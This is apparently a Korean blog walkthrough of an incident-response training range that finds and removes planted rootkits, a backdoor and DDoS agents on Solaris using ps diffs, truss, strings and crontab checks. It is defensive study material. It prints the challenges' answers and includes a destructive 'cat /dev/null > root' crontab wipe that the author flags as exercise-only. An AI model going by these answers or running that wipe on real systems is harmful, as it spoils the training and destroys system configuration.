sis.or.kr 의 침해사고대응 훈련장에 대한 풀이인데요,
40개 다 써놓으면 문제가 되겠죠..
그래서 1페이지의 20문제만 풀이를 써놓습니다.
기존의 해킹문제들은 침투를 해서 어떻게 더 높은 권한을
획득하느냐, 얻고자 하는걸 얻느냐 였다면,
이건 침임했던 해커의 흔적이 무엇인가?
어떻게 하면 해커의 재 침입을 막을 수 있는가?
등에 대해서 알 수 있는 문제들이라고 할 수 있습니다.
좀 엉터리 같이 푼게 마음에 걸리네요.. :)
잘못된 내용은
dual5651@hotmail.com 으로 ~
=====================================================
Question 1 - truss를 이용한 시스템 명령 변조 여부 확인
=====================================================
먼저 su를 이용해 root로 들어갑니다.
login: dual5651
Password:
Last login: Sat Apr 21 12:52:02 from 59.5.43.67
Sun Microsystems Inc. SunOS 5.8 Generic Patch October 2001
$ su root
Password:
# challenge 1
Now, You are challenging question 1.
Good Luck!
이 문제를 풀이하는데 쓰이는 truss 옵션은 -t 인데,
이 옵션은 특정한 시스템 서비스 호출에 대해서만 trace를 하도록 합니다.
truss -t open ls 를 하게 되면, ls 라는 프로그램에 대하여 open()하는것만
Trace한 결과를 보여주게 됩니다.
솔라리스 환경에서는 truss가 있고, linux에서는 strace 명령어, ltrace명령어등이 존재
합니다.
# truss -t open ls
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/lib/librt.so.1", O_RDONLY) = 3
open("/usr/lib/libgen.so.1", O_RDONLY) = 3
open("/usr/lib/libnsl.so.1", O_RDONLY) = 3
open("/usr/lib/libc.so.1", O_RDONLY) = 3
open("/usr/lib/libaio.so.1", O_RDONLY) = 3
open("/usr/lib/libdl.so.1", O_RDONLY) = 3
open("/usr/lib/libmp.so.2", O_RDONLY) = 3
open("/usr/platform/SUNW,Sun-Fire-880/lib/libc_psr.so.1", O_RDONLY) = 3
open64("/dev/ptyr", O_RDONLY) = 3
open64(".", O_RDONLY|O_NDELAY) = 3
open64("./../", O_RDONLY|O_NDELAY) = 4
open64("./../../", O_RDONLY|O_NDELAY) = 4
open("/etc/mnttab", O_RDONLY) = 5
local.cshrc local.login local.profile s r
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자가 숨기려고 한 파일 이름은 무엇입니까?
Answer > s r
Congratz! You made a success of challenge!
=====================================================
Question 2 - 공개도구를 이용한 분석
=====================================================
# challenge 2
Now, You are challenging question 2.
Good Luck!
이 문제는 정상적인 방법으로 풀고자 한다면,
/var 에 접근하는 프로세스를 fuser 로 찾아내면 될것이다.
하지만 현재 시스템에는 fuser가 존재하지 않는것으로 보임으로,
문제를 시작하기 전의 프로세스와 문제를 시작하고 나서의 프로세스를
비교해서 대상 프로세스를 찾아보면,
before :
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ? 0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2 0:00 sh
root 65 1 0 20:17:04 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 20:17:06 ? 1:12 /usr/lib/picl/picld
root 74 1 0 20:17:05 ? 0:00 devfsadmd
root 185 1 0 20:17:12 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ? 0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ? 0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ? 0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ? 0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ? 0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ? 0:00 /usr/lib/sendmail -bd -q15m
root 14507 14498 0 14:58:16 pts/2 0:00 ps -ef
root 517 515 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ? 0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ? 0:00 in.telnetd
root 596 1 0 20:17:42 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ? 0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ? 0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ? 0:00 /usr/lib/saf/sac -t 300
root 13560 13477 0 14:46:22 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 3374 636 0 20:26:51 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ? 0:00 /usr/openwin/bin/fbconsole -d :0
after:
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ? 0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2 0:00 sh
root 65 1 0 20:17:04 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 20:17:06 ? 1:12 /usr/lib/picl/picld
root 74 1 0 20:17:05 ? 0:00 devfsadmd
root 185 1 0 20:17:12 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ? 0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ? 0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ? 0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ? 0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ? 0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ? 0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ? 0:00 in.telnetd
root 596 1 0 20:17:42 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ? 0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ? 0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ? 0:00 /usr/lib/saf/sac -t 300
root 14715 14498 0 15:00:42 pts/2 0:00 ps -ef
root 13560 13477 0 14:46:22 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 14682 1 0 15:00:40 ? 0:00 /usr/bin/vfsadmd
root 3374 636 0 20:26:51 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ? 0:00 /usr/openwin/bin/fbconsole -d :0
/usr/bin/vfsadmd 라는 프로세스가 새롭게 등장한 것을 볼 수 있다.
해당 프로세스를 죽이고, strings로 열어보았다.
# kill -9 14682
# strings /usr/bin/vfsadmd
vfsadmd
/var/du y.log
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Error : Failed to getting information of CERT-TR environment!
Error : Process is currenlty running..
SUNWrc RCMGR
/dev/null
Fork
Chdir
Setsid
%s/%s/%s.%d
.cache
udpport
tcpport
/var에 있는 dummy.log라는 파일을 대상 파일로 짐작하여 볼 수 있다.
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자가 오픈한 파일의 전체 경로는?
Answer > /var/du y.log
Congratz! You made a success of challenge!
=====================================================
Question 3 - Forensic Duplication
=====================================================
# challenge 3
Now, You are challenging question 3.
Good Luck!
df 명령어를 이용해 파티션 목록을 보자.
# df
/ (/dev/dsk/c1t1d0s0 ): 7779844 blocks 495156 files
/usr (/dev/dsk/c1t1d0s4 ): 3729410 blocks 934939 files
/boot (/dev/dsk/c1t5d0s2 ): 61414 blocks 18991 files
/proc (/proc ): 0 blocks 29928 files
/dev/fd (fd ): 0 blocks 0 files
/etc/mnttab (mnttab ): 0 blocks 0 files
/var (/dev/dsk/c1t1d0s5 ):91428048 blocks 5972252 files
/var/run (swap ):23230880 blocks 440748 files
/tmp (swap ):23230880 blocks 440748 files
/data (/dev/dsk/c1t1d0s6 ): 4408 blocks 18876 files
/home1 (/dev/dsk/c1t2d0s7 ):138035188 blocks 8473946 files
/backup (/dev/dsk/c1t1d0s7 ): 219640 blocks 57019 files
/home3 (/dev/dsk/c1t4d0s7 ):141184988 blocks 8476538 files
/home4 (/dev/dsk/c1t5d0s0 ): 582428 blocks 152061 files
/home (/dev/dsk/c1t5d0s3 ): 2641676 blocks 324324 files
/mnt (/dev/dsk/c1t5d0s7 ):133757598 blocks 8056345 files
복사 대상 파티션은 /data 였다.
dd 명령어에 다음과 같은 옵션을 주어서 대상 파일을 백업할 수 있다.
dd if=copy해올파티션 of=copy한파일
# dd if=/dev/dsk/c1t1d0s6 of=/home1/user001/victim.data.dd
30528+0 records in
30528+0 records out
# cd /home1/user001
# ls -al
total 15280
drwxr-xr-x 2 user001 training 512 Apr 21 15:11 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 user001 training 185 Apr 21 14:46 .profile
-rw-r--r-- 1 user001 training 124 Apr 21 14:46 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 21 14:46 local.login
-rw-r--r-- 1 user001 training 582 Apr 21 14:46 local.profile
-rw-r--r-- 1 root other 3 Apr 21 15:05 test.c
-rw-r--r-- 1 root other 15630336 Apr 21 15:11 victim.data.dd
파일이 생겼음을 볼 수 있다.
md5sum
=====================================================
Question 4 - 루트킷
=====================================================
이번에도 간단히 프로세스 비교 방법으로 풀어보면,
before :
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ? 0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2 0:00 sh
root 65 1 0 20:17:04 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 20:17:06 ? 1:14 /usr/lib/picl/picld
root 74 1 0 20:17:05 ? 0:00 devfsadmd
root 185 1 0 20:17:12 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ? 0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ? 0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ? 0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ? 0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ? 0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ? 0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ? 0:00 in.telnetd
root 596 1 0 20:17:42 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ? 0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ? 0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ? 0:00 /usr/lib/saf/sac -t 300
root 16720 14498 0 15:30:48 pts/2 0:00 ps -ef
root 13560 13477 0 14:46:22 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 3374 636 0 20:26:51 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ? 0:00 /usr/openwin/bin/fbconsole -d :0
after:
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cer
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ? 0:00 ipmon -Ds
root 14498 13621 0 14:58:08 pts/2 0:00 sh
root 65 1 0 20:17:04 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 20:17:06 ? 1:14 /usr/lib/picl/picld
root 74 1 0 20:17:05 ? 0:00 devfsadmd
root 185 1 0 20:17:12 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ? 0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ? 0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ? 0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/
ib/sf880drd
root 438 1 0 20:17:25 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ? 0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ? 0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ? 0:00 htt_server -port 9010 -syslog -m
ssage_locale C
root 525 1 0 20:17:40 ? 0:00 /usr/lib/sendmail -bd -q15m
root 16782 14498 0 15:31:28 pts/2 0:00 ps -ef
root 517 515 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ? 0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ? 0:00 /usr/lib/im/htt -port 9010 -sysl
g -message_locale C
root 13477 418 0 14:45:02 ? 0:00 in.telnetd
root 596 1 0 20:17:42 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/
nmp/conf
root 561 1 0 20:17:41 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ? 0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ? 0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ? 0:00 /usr/lib/saf/sac -t 300
root 16933 1 0 15:31:26 ? 0:00 /usr/bin/inetd-s
root 13560 13477 0 14:46:22 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.4
.67
root 3374 636 0 20:26:51 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ? 0:00 /usr/openwin/bin/fbconsole -d :0
# ls /usr/bin/inetd-s
#
rootkit이여서, ls로는 볼 수 없는것으로 보인다.
# cd /proc/16933/object
# ls -al
total 2540
dr-x------ 2 root other 544 Apr 21 15:33 .
dr-x--x--x 5 root other 736 Apr 21 15:33 ..
-r-xr--r-- 0 root other 126068 Apr 21 15:33 a.out
-r-xr-xr-x 1 root bin 4848 May 6 2006 ufs.118.28.306902
-r-xr-xr-x 1 root bin 5292 May 6 2006 ufs.118.28.343137
-r-xr-xr-x 1 root bin 24968 May 6 2006 ufs.118.28.343169
-r-xr-xr-x 1 root bin 238608 May 6 2006 ufs.118.28.343181
-r-xr-xr-x 1 root bin 70864 May 6 2006 ufs.118.28.343185
-r-xr-xr-x 1 root bin 1158072 May 6 2006 ufs.118.28.343531
-r-xr-xr-x 1 root bin 911328 May 6 2006 ufs.118.28.343533
# strings a.out
inetd-s
program_name : h 3r
could not unlink file %s, program exiting abnormally
warez v1.0 unlinked and daemonized, listening on port %d
err: cant dup (%s)
no memory for %s
/bin/sh
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Command (type 'quit' to quit) :
connection closed by client
..........
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격 프로그램의 이름은?
Answer > h 3r
Congratz! You made a success of challenge!
=====================================================
Question 5 - UDP Flooding
=====================================================
# challenge 5
Now, You are challenging question 5.
Good Luck!
먼저 프로세스 비교를 통해 대상 프로세스를 찾아 냅니다.
before :
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ? 0:00 ipmon -Ds
root 21268 13621 0 16:30:01 pts/2 0:00 sh
root 65 1 0 20:17:04 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 20:17:06 ? 1:17 /usr/lib/picl/picld
root 74 1 0 20:17:05 ? 0:00 devfsadmd
root 185 1 0 20:17:12 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ? 0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ? 0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ? 0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ? 0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ? 0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ? 0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ? 0:00 in.telnetd
root 596 1 0 20:17:42 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ? 0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ? 0:00 /usr/lib/saf/ttymon
root 699 1 0 20:17:44 ? 0:00 /usr/lib/saf/sac -t 300
root 21344 21268 0 16:30:28 pts/2 0:00 ps -ef
root 13560 13477 0 14:46:22 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 3374 636 0 20:26:51 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ? 0:00 /usr/openwin/bin/fbconsole -d :0
after :
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 20:17:44 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 20:17:12 ? 0:00 ipmon -Ds
root 21268 13621 0 16:30:01 pts/2 0:00 sh
root 65 1 0 20:17:04 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 20:17:06 ? 1:17 /usr/lib/picl/picld
root 74 1 0 20:17:05 ? 0:00 devfsadmd
root 185 1 0 20:17:12 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 20:17:24 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 20:17:13 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 20:17:26 ? 0:00 /usr/sbin/cron
root 445 1 0 20:17:25 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 20:17:29 ? 0:00 /usr/sbin/nscd
root 431 1 0 20:17:25 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 20:17:24 ? 0:00 /usr/sbin/in.named
root 467 1 0 20:17:29 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 20:17:25 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 20:17:40 ? 0:00 /usr/lib/power/powerd
root 480 1 0 20:17:39 ? 0:00 /usr/lib/lpsched
root 530 528 0 20:17:40 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 20:17:40 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 20:17:40 ? 0:00 /usr/sbin/vold
root 515 1 0 20:17:40 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 20:17:40 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 13477 418 0 14:45:02 ? 0:00 in.telnetd
root 596 1 0 20:17:42 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 20:17:41 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 20:17:44 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 20:17:43 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 20:17:43 ? 0:00 mibiisa -r -p 32797
root 661 1 0 20:17:43 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 20:17:44 ? 0:00 /usr/lib/saf/ttymon
root 21416 1 0 16:31:07 ? 0:00 /usr/sbin/rpc.listen
root 699 1 0 20:17:44 ? 0:00 /usr/lib/saf/sac -t 300
root 21426 1 0 16:31:07 ? 0:00 /usr/sbin/master
root 13560 13477 0 14:46:22 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 21428 21268 0 16:31:08 pts/2 0:00 ps -ef
root 3374 636 0 20:26:51 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 20:26:51 ? 0:00 /usr/openwin/bin/fbconsole -d :0
두가지 프로세스가 새로 생성되는 것을 볼 수 있고,
부모의 PID가 1인것을 보아 crontab을 뒤져볼 필요가 있을거 같습니다.
# cd crontabs
# ls -al
total 200
drwxr-xr-x 2 root sys 2048 Mar 29 2006 .
drwxr-xr-x 4 root sys 512 Sep 26 2003 ..
-rw-r--r-- 1 root sys 190 Sep 26 2003 adm
-rw------- 1 root other 181176 Dec 20 2004 core
-r--r--r-- 1 root root 750 Sep 26 2003 lp
-rw-r--r-- 1 root sys 516 Apr 21 16:31 root
-rw-r--r-- 1 root sys 308 Sep 26 2003 sys
-r-------- 1 root training 0 Jul 10 2005 user016
-r--r--r-- 1 root sys 404 Sep 26 2003 uucp
# cat root | grep rpc.listen
10 3 * * 0,4 /usr/sbin/rpc.listen
역시 목록에 들어 있음을 볼 수 있습니다.
strings로 대상들로 부터 정보를 수집합니다.
rpc.listen :
strings /usr/sbin/rpc.listen
rpc.listen
127. . .1
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Error : Failed to getting information of CERT-TR environment!
Error : Process is currenlty running..
Bind
%s %s %s
aIf3YWfOhw.V.
PONG
Recvfrom
Socket
*HELLO*
/dev/null
Fork
Chdir
Setsid
%s/%s/%s.%d
.cache
udpport
tcpport
IP로 생각되는 문자열을 발견할 수 있습니다.
master :
strings /usr/sbin/master
master
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Error : Process is currenlty running..
---v
tr oo %s
l44adsl
gOrave
17:43:33
v1.07d2+f3+c
Dec 24 2003
tr oo %s [%s:%s]
Bind
bcast
Listing Bcasts.
quit
bye bye.
%s %s
대상 프로그램의 이름으로 짐작되는 문자열을 발견할 수 있습니다.
이제 정보를 수집하였으니, 대상 프로세스들을 종료하고 파일들을 삭제합니다.
# kill -9 21426
# kill -9 21416
# rm -rf /usr/sbin/master
# rm -rf /usr/sbin/rpc.listen
# pwd
/var/spool/cron/crontabs
# cat /dev/null > root
임시적인 문제풀이이기 떄문에, 마지막에 /dev/null을 root에 넣은 것이지 실제에서는
rpc.listen 부분만 지워주어야 합니다.
finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 설치된 DDoS 도구의 이름은 무엇인가?
Answer > tr oo
Question > Master 서버의 IP는 무엇인가?
Answer > 127. . .1
Congratz! You made a success of challenge!
=====================================================
Question 6 - 물리적 보안 영역
=====================================================
먼저 ps -ef를 이용해 프로세스 목록을 구해 둡니다.
ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Dec02 ? 00:00:05 init
root 2 1 0 Dec02 ? 00:00:00 [keventd]
root 3 1 0 Dec02 ? 00:00:00 [kapmd]
root 4 1 0 Dec02 ? 00:00:00 [ksoftirqd_CPU0]
root 5 1 0 Dec02 ? 00:00:00 [kswapd]
root 6 1 0 Dec02 ? 00:00:00 [bdflush]
root 7 1 0 Dec02 ? 00:00:00 [kupdated]
root 8 1 0 Dec02 ? 00:00:00 [mdrecoveryd]
root 12 1 0 Dec02 ? 00:00:00 [kjournald]
root 128 1 0 Dec02 ? 00:00:00 [kjournald]
root 443 1 0 Dec02 ? 00:00:00 syslogd -m 0
root 448 1 0 Dec02 ? 00:00:00 klogd -x
root 551 1 0 Dec02 ? 00:00:00 xinetd -stayalive -reuse -pidfil
e /var/run/xinetd.pid
root 575 1 0 Dec02 ? 00:00:00 sendmail: accepting connections
bin 606 1 0 Dec02 ? 00:00:00 cannaserver -syslog -u bin -inet
root 620 1 0 Dec02 ? 00:00:00 crond
root 641 1 0 Dec02 tty1 00:00:00 /sbin/mingetty tty1
root 642 1 0 Dec02 tty2 00:00:00 /sbin/mingetty tty2
root 643 1 0 Dec02 tty3 00:00:00 /sbin/mingetty tty3
root 644 1 0 Dec02 tty4 00:00:00 /sbin/mingetty tty4
root 645 1 0 Dec02 tty5 00:00:00 /sbin/mingetty tty5
root 646 1 0 Dec02 tty6 00:00:00 /sbin/mingetty tty6
root 649 551 0 Dec02 ? 00:00:00 in.telnetd
root 650 649 0 Dec02 ? 00:00:00 login -- root
root 651 650 0 Dec02 pts/0 00:00:00 -bash
root 748 651 0 01:17 pts/0 00:00:00 ps -ef
kstat -P 옵션을 이용해 모든 프로세스 목록을 구해 옵니다.
kstat -P
PID PPID UID GID COMMAND
1 0 0 0 init
2 1 0 0 keventd
3 1 0 0 kapmd
